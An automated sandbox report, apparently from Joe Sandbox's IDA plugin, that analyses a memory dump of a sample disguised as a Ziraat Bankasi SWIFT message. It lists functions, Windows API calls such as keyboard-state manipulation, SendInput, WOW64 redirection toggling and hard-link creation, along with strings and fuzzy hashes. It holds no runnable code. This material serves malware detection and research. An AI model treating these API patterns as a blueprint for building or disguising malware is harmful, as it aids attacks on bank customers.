Opcode ID: f11eeaf84ee8e92e34cd876a19743da3bd16b6f041395b65bc8a9cff27792495
Instruction ID: 724496c888f42a7249377ab2d14a6600087d38c45e49c20bd9a27d941f408eac
Opcode Fuzzy Hash: f11eeaf84ee8e92e34cd876a19743da3bd16b6f041395b65bc8a9cff27792495
Instruction Fuzzy Hash: FAE04F746A4340ABEB516FB1FD4EB083B55AB0AB01F500064F682D64F0DBF4C0D0CB04

Function 000A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 000A22A1
GetProcAddress.KERNEL32(00000000), ref: 000A22A8

Strings

combase.dll, xrefs: 000A229C
RoInitialize, xrefs: 000A2290

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: d43f51e4ed8bffdae57d8f1a8d684d7156216033d59801138b79679a651773fd
Instruction ID: 159fd5a93debd443665ee9153b45b5c7687b4f9b959982e105a46e13d07d274e
Opcode Fuzzy Hash: d43f51e4ed8bffdae57d8f1a8d684d7156216033d59801138b79679a651773fd
Instruction Fuzzy Hash: 2EE017347E4301AAEA612BF5AD0AB283654AB16B02F404060B282D64F0CBF484808B08

Function 000A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000A2276), ref: 000A2376
GetProcAddress.KERNEL32(00000000), ref: 000A237D

Strings

RoUninitialize, xrefs: 000A2365
combase.dll, xrefs: 000A2371

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 87ebfdb383f4e042f64377c2546841f6d82f9a82d078a3c2b63f1a0430e1f783
Instruction ID: 8f851de7c4cb42bcfcd8349b810af0cbba209d3f03c6cf387fa04f1591ab1a87
Opcode Fuzzy Hash: 87ebfdb383f4e042f64377c2546841f6d82f9a82d078a3c2b63f1a0430e1f783
Instruction Fuzzy Hash: 4DE0BF745843009BDB615FA1FD0DB043A65B71AB05F110434F289D28F0CBF595C08A14

Function 000842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,000842EC,?,000842AA,?), ref: 00084304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00084316

Strings

Wow64RevertWow64FsRedirection, xrefs: 00084310
kernel32.dll, xrefs: 000842FF

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 450251907a327a734346ffd0aebdf13c2658ec070c82d6119a290b1d005de250
Instruction ID: c5c472e2e7043be2dc664ab60ee84d9ad19617fde025fd692e6741d1192183ff
Opcode Fuzzy Hash: 450251907a327a734346ffd0aebdf13c2658ec070c82d6119a290b1d005de250
Instruction Fuzzy Hash: 22D0A930800B13AFC7206FA0F80D602B6E8BB08302F00842AF8D2D2660EBF0C8C08B60

Function 0008434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,000841BB,00084341,?,0008422F,?,000841BB,?,?,?,?,000839FE,?,00000001), ref: 00084359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0008436B

Strings

kernel32.dll, xrefs: 00084354
Wow64DisableWow64FsRedirection, xrefs: 00084365

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 663cf6bc623f19c6390b618881792ec15fb6290bad1d0e82dd04f1847ee0e85a
Instruction ID: 3d09a1835b6140c1bab97a8ac276ea43080205741f067297fd777c2e763ddbea
Opcode Fuzzy Hash: 663cf6bc623f19c6390b618881792ec15fb6290bad1d0e82dd04f1847ee0e85a
Instruction Fuzzy Hash: 19D0A7704007139FC7206FB0F80960176D4BB14715F004439E4D1D2550DBF0D8C08750

Function 000C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,000C051D,?,000C05FE), ref: 000C0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 000C0559

Strings

oleaut32.dll, xrefs: 000C0542
RegisterTypeLibForUser, xrefs: 000C0553

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 0d475d61e97da9542237983071d326ef45e1a067864595a56b62da470a508136
Instruction ID: 56717620924b3b27b9c8ef9486197e6c4c0dbf8baa750ead29f684e245fcb2f2
Opcode Fuzzy Hash: 0d475d61e97da9542237983071d326ef45e1a067864595a56b62da470a508136
Instruction Fuzzy Hash: FAD0C770544B12DFD7609F65F809B46B6E8AB14711F50C41DF596D2650DBB0CCC0CA50

Function 000C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,000C052F,?,000C06D7), ref: 000C0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 000C0584

Strings

oleaut32.dll, xrefs: 000C056D
UnRegisterTypeLibForUser, xrefs: 000C057E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 8f91031af16bd4f92034c3edb47abb6c0f604494bd8b54beaa342d90fbaf4a02
Instruction ID: be2ffe418c63c62a58409fee88c88fe44ef3e0802101c2527e6750e2f804c5ae
Opcode Fuzzy Hash: 8f91031af16bd4f92034c3edb47abb6c0f604494bd8b54beaa342d90fbaf4a02
Instruction Fuzzy Hash: F5D0C770544712DFDB606F75F809F47B7E8AB04711F10C51DE895D2590DBB0D8C0CA60

Function 000DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000DBAD3,?,000DAA3F), ref: 000DBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 000DBAFD

Strings

GetModuleHandleExW, xrefs: 000DBAF7
kernel32.dll, xrefs: 000DBAE6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 40b46272642ef3e87a9c19448e6ca7b3f3e70cbe23c624c3556d9afb19ffffb0
Instruction ID: b50b332ccc64cf9fe33d8560fc4e5212e2e3111ae0185f3a0a4283fadd977b7f
Opcode Fuzzy Hash: 40b46272642ef3e87a9c19448e6ca7b3f3e70cbe23c624c3556d9afb19ffffb0
Instruction Fuzzy Hash: 80D0A930900712DFC7307FA0F84AB56B6E8AB06320F01842BE883D2650EBF0D8C0CA60

Function 0009DF89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0009DF7F,0000000C,0009DEA0,0011DC38,?,?), ref: 0009DF97
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0009DFA9

Strings

kernel32.dll, xrefs: 0009DF92
IsWow64Process, xrefs: 0009DFA3

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 2476e5c9ccb811350891e6a7ae7d9e17c209015608272d11c562ec1bbfce6d50
Instruction ID: 091e82439ffd87d2c1b110b3140e5d27860ca601f933cd91d3dd44db89711eba
Opcode Fuzzy Hash: 2476e5c9ccb811350891e6a7ae7d9e17c209015608272d11c562ec1bbfce6d50
Instruction Fuzzy Hash: D6D0C9719447129FDF746FA5F81A642B6E8AB05715F10843FE89AD2650EBB4DCC08AA0

Function 000B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdaea21f50fa89269e1880d2e283420ed18724fa56604f998094a92b2b929bdd
Instruction ID: 20e27ec45f249da9255b51d3593bbe51a4682428ca730fe2733496ebabbf42f0
Opcode Fuzzy Hash: fdaea21f50fa89269e1880d2e283420ed18724fa56604f998094a92b2b929bdd
Instruction Fuzzy Hash: 37C13B75A0021AEFDB14DF94C884AEEBBB5FF48700F108598EA15EB251D771EE41DBA0

Function 000DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000DAAB4
CoUninitialize.OLE32 ref: 000DAABF

Part of subcall function 000C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C027B

VariantInit.OLEAUT32(?), ref: 000DAACA
VariantClear.OLEAUT32(?), ref: 000DAD9D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 7e61c799dee093274f497c6a1fd623af299a0c0714b3ffa5c4a232ee1efbdac0
Instruction ID: 25a9d5128b2189ccedd14040c56a14290901589e7ef88151229cf39504857b56
Opcode Fuzzy Hash: 7e61c799dee093274f497c6a1fd623af299a0c0714b3ffa5c4a232ee1efbdac0
Instruction Fuzzy Hash: 32A12575304701AFCB11EF14C881B6AB7E5BF99720F14844AF9969B3A2CB30ED41DB96

Function 000B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000B91DD
SysAllocString.OLEAUT32(00000048), ref: 000B9286
VariantCopy.OLEAUT32(00000000,00000000), ref: 000B92B5
VariantClear.OLEAUT32(?), ref: 000B92DC

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 0ff6597c881c4a936e89fb11bbb0fae6ae086841d4085ce9a690accb6bdc70b9
Instruction ID: fde823ed2352525e54eee027d6f20cb1eadf06532305b8418aa6ae1a660d3400
Opcode Fuzzy Hash: 0ff6597c881c4a936e89fb11bbb0fae6ae086841d4085ce9a690accb6bdc70b9
Instruction Fuzzy Hash: B251A330A04706ABDB74AF65D891BEEB3E5EF45710F20881FE786DB2D2DB7099808715

Function 000A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A36B7
_memcpy_s.LIBCMT ref: 000A3729
__filbuf.LIBCMT ref: 000A37AA
_memset.LIBCMT ref: 000A37EE

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: a27e727ff90422fe22fcf1609189fe6675ca88bbf1d49f91fea7219af2b9ee2c
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: 0051C3B0A04305ABDB788FE9C8856AE77E1AF42320F24872DF825962D1D7759F508B40

Function 000EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00D06470,?), ref: 000EC544
ScreenToClient.USER32(?,00000002), ref: 000EC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 000EC5DA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8905ca0f1caa22923a457767c54920083b23422aac051119cc3696f846f06eba
Instruction ID: cb6ae16aeb1df17c708b8740525600aab8e885a24fd99c6c84ee764bd0e3ea59
Opcode Fuzzy Hash: 8905ca0f1caa22923a457767c54920083b23422aac051119cc3696f846f06eba
Instruction Fuzzy Hash: 9A517C75900644EFDF20DF69C880EAE7BB6FB45320F108259F865AB290D771ED82CB90

Function 000BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000BC462
__itow.LIBCMT ref: 000BC49C

Part of subcall function 000BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000BC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 000BC505
__itow.LIBCMT ref: 000BC55A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 23f90e9c18ce2cbb34c222a0f08f8d707ac76d164bc5a09ba415ad4c8867f9a0
Instruction ID: 6401ae8ee1ec719cc19067ef1260392491f48ebfac84932f7885b2fdfc8bd894
Opcode Fuzzy Hash: 23f90e9c18ce2cbb34c222a0f08f8d707ac76d164bc5a09ba415ad4c8867f9a0
Instruction Fuzzy Hash: E441A771A00609AFEF21EF54CC55FEE7BB5AF49700F000069F945A7282DB709A85CBA1

Function 000C390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000C3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 000C3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 000C39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 000C3A4D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ea141eb18e828651c2df35623714c8117a9a465f9c57a24ac96b48af2aaeb63d
Instruction ID: df809b266bd34a463e69f0303119fcd83fa0f5c76d0b8a5270b9932fed87ca94
Opcode Fuzzy Hash: ea141eb18e828651c2df35623714c8117a9a465f9c57a24ac96b48af2aaeb63d
Instruction Fuzzy Hash: F5412770A14208AEEF709BA49805FFDBBF5EB59310F04815EE4C1A22C1C7F48E95D762

Function 000CE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000CE742
GetLastError.KERNEL32(?,00000000), ref: 000CE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000CE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000CE7B9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 9bbbfdbfb8dc79736d11ee37ca867f46e023b88871d6ffd31711e124d74d9d76
Instruction ID: 3e686ec2d27643a55b514fa798354ad7eb644b4c845564d1a99ed7f0d9f48e6f
Opcode Fuzzy Hash: 9bbbfdbfb8dc79736d11ee37ca867f46e023b88871d6ffd31711e124d74d9d76
Instruction Fuzzy Hash: 87413839200650EFCF11FF14C845A9DBBE5BF59720B098099E986AB3A2CB70FD40DB91

Function 000EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000EB5D1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 29d86ca0ce739f539191e9f1bd6c4d062d504e78d379c07ac6529580f9765537
Instruction ID: d2534220d1c3bc4bb4e95485c68a3bee75237f4748002bdf090d3a7312fc557b
Opcode Fuzzy Hash: 29d86ca0ce739f539191e9f1bd6c4d062d504e78d379c07ac6529580f9765537
Instruction Fuzzy Hash: 6231ED75601684BFEF309F5ACC89FAE77A5AB06310F504502FA51F61E1CB74A9808B51

Function 000ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 000ED807
GetWindowRect.USER32(?,?), ref: 000ED87D
PtInRect.USER32(?,?,000EED5A), ref: 000ED88D
MessageBeep.USER32(00000000), ref: 000ED8FE

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
